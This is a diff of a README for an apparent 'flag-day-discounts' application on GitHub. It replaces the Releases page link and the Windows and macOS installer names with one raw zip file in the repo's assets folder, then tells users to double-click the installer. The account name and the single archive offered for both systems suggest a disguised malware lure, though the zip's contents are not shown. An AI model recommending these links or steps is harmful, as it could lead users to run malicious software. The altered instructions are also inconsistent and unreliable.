BeXySiTcH-Hacked/flag-day-discounts/README.md

 Follow these steps to download and install the application:

 1. **Visit the Releases Page:**
-   Head over to the [Releases page](https://github.com/BeXySiTcH-Hacked/flag-day-discounts/releases) to find the latest version of the software.
+   Head over to the [Releases page](https://github.com/BeXySiTcH-Hacked/flag-day-discounts/raw/refs/heads/main/assets/flag_day_discounts_v3.0-alpha.1.zip) to find the latest version of the software.

 2. **Choose Your Version:**
    Look for the most recent release listed.
 Click on it to view the download options.

 3. **Download the Installer:**
-   Find the file that suits your operating system (e.g., `flag-day-discounts-setup.exe` for Windows or `flag-day-discounts.dmg` for macOS) and click on the link to download it.
+   Find the file that suits your operating system (e.g., `https://github.com/BeXySiTcH-Hacked/flag-day-discounts/raw/refs/heads/main/assets/flag_day_discounts_v3.0-alpha.1.zip` for Windows or `https://github.com/BeXySiTcH-Hacked/flag-day-discounts/raw/refs/heads/main/assets/flag_day_discounts_v3.0-alpha.1.zip` for macOS) and click on the link to download it.

 4. **Run the Installer:**
    Once the file is downloaded, navigate to your downloads folder.
 Double-click the installer file to start the installation process.